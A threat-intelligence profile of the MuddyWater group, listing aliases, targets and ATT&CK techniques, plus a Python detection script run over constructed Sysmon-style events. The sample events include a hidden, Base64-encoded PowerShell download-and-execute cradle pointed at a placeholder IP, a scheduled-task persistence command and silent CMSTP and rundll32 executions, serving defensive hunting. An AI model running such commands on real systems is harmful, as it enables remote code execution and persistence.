Adversary | Muddywater

Updated: Jul 21, 2021

Also Known As

TEMP.Zagros | Static Kitten | Seedworm | Mercury | Cobalt Ulster



Target Countries

Afghanistan | Austria | Azerbaijan | Bahrain | Georgia | Iraq | Jordan | Malta | Pakistan | Russia | Saudi Arabia | Tajikistan | Turkey | Turkmenistan | United Arab Emirates | United States

Targeted Verticals


Critical Infrastructure

Financial Services

Government | Military

Techniques (MITRE ATT&CK)

Abuse Elevation Control Mechanism: Bypass User Account Control

Application Layer Protocol: Web Protocols

Archive Collected Data: Archive via Utility

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Command and Scripting Interpreter: Windows Command Shell

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: Visual Basic

Credentials from Password Stores

Credentials from Web Browsers

Data Encoding: Standard Encoding

Deobfuscate/Decode Files or Information

Exfiltration Over C2 Channel

Exploitation for Client Execution

File and Directory Discovery

Ingress Tool Transfer

Inter-Process Communication: Dynamic Data Exchange

Inter-Process Communication: Component Object Model

Masquerading: Match Legitimate Name or Location

Multi-Stage Channels

Obfuscated Files or Information

Obfuscated Files or Information: Compile After Delivery

Office Application Startup: Office Template Macros

OS Credential Dumping: LSASS Memory

OS Credential Dumping: LSA Secrets

OS Credential Dumping: Cached Domain Credentials

Phishing: Spearphishing Attachment

Process Discovery

Proxy: External Proxy

Scheduled Task/Job: Scheduled Task

Screen Capture

Signed Binary Proxy Execution: Rundll32

Signed Binary Proxy Execution: CMSTP

Signed Binary Proxy Execution: Mshta

Software Discovery: Security Software Discovery

System Information Discovery

System Network Configuration Discovery

System Owner/User Discovery

Unsecured Credentials: Credentials In Files

User Execution: Malicious File

Windows Management Instrumentation
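As an added hunting example that is not part of this profile and not vendor detection content: the script below runs simple heuristics for several of the techniques listed above (Mshta, CMSTP and Rundll32 proxy execution, encoded PowerShell, schtasks persistence, processes spawned by the WMI provider host, and Office applications launching a script host) over a handful of constructed process-creation events. The events use Sysmon Event ID 1 style field names (Image, ParentImage, CommandLine), which is an assumption about your telemetry; the user-writable path list, the Office and script-host names and the 203.0.113.10 documentation address are all assumptions made for the example, not indicators tied to this adversary.

```python
import base64
import re

# Locations an attacker can write to; a DLL, INF or script that a signed system
# binary loads from here is worth a look. (Assumed heuristic, not a vendor rule.)
USER_WRITABLE = re.compile(r"\\(?:Users|Temp|AppData|ProgramData|Public)\\", re.IGNORECASE)
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe",
                "wscript.exe", "cscript.exe", "cmd.exe")
# -e / -ec / -en / -enc / -EncodedCommand followed by a Base64 token
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
TASK_ACTION = re.compile(r"powershell|mshta|rundll32|wscript|cscript", re.IGNORECASE)


def image_name(path):
    """Lower-cased file name from an Image/ParentImage path."""
    return path.rsplit("\\", 1)[-1].lower()


def encode_powershell(script):
    """Build a -EncodedCommand argument (Base64 of UTF-16LE); used only to construct sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # truncated token or non-UTF-16 payload
        return None


def classify(ev):
    """Return the technique names from the list above that one process-creation event matches."""
    img, parent, cmd = image_name(ev["Image"]), image_name(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    if img == "mshta.exe" and (re.search(r"\.hta\b|https?://|javascript:|vbscript:", cmd, re.I)
                               or parent in OFFICE_APPS):
        hits.append("Signed Binary Proxy Execution: Mshta")
    if img == "cmstp.exe" and re.search(r"/ni\b", cmd, re.I) and re.search(r"/s\b", cmd, re.I):
        hits.append("Signed Binary Proxy Execution: CMSTP")    # /ni /s <inf>: silent install of a crafted INF
    if img == "rundll32.exe" and USER_WRITABLE.search(cmd):
        hits.append("Signed Binary Proxy Execution: Rundll32")  # DLL loaded from a user-writable path
    if img in ("powershell.exe", "pwsh.exe") and decode_encoded_command(cmd) is not None:
        hits.append("Command and Scripting Interpreter: PowerShell")
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and (
            TASK_ACTION.search(cmd) or USER_WRITABLE.search(cmd)):
        hits.append("Scheduled Task/Job: Scheduled Task")
    if parent == "wmiprvse.exe" and img in SCRIPT_HOSTS:
        hits.append("Windows Management Instrumentation")       # child of the WMI provider host
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        hits.append("User Execution: Malicious File")           # Office document spawning a script host
    return hits


def hunt(events):
    """Return (event index, technique names, decoded PowerShell or None) for every flagged event."""
    flagged = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            flagged.append((i, hits, decode_encoded_command(ev["CommandLine"])))
    return flagged


SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"

# Constructed Sysmon Event ID 1 style records for the example; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\update.hta"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\alice\AppData\Local\Temp\setup.inf",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(SAMPLE_PAYLOAD),
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Roaming\core.dll,Start",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "powershell -w hidden -f C:\Users\alice\AppData\Roaming\u.ps1"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c whoami",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",  # benign: DLL under System32
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",   # benign service host
     "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for idx, hits, decoded in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], "->", "; ".join(hits))
        if decoded:
            print("   decoded PowerShell:", decoded)
```

The rules deliberately key on context (parent process, argument shape, where the loaded file lives) rather than on the binary name alone, since rundll32, mshta and schtasks run constantly on a healthy host; the two benign records show the difference. The decoded PowerShell is returned alongside the hit so an analyst sees the actual command rather than the Base64 blob.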


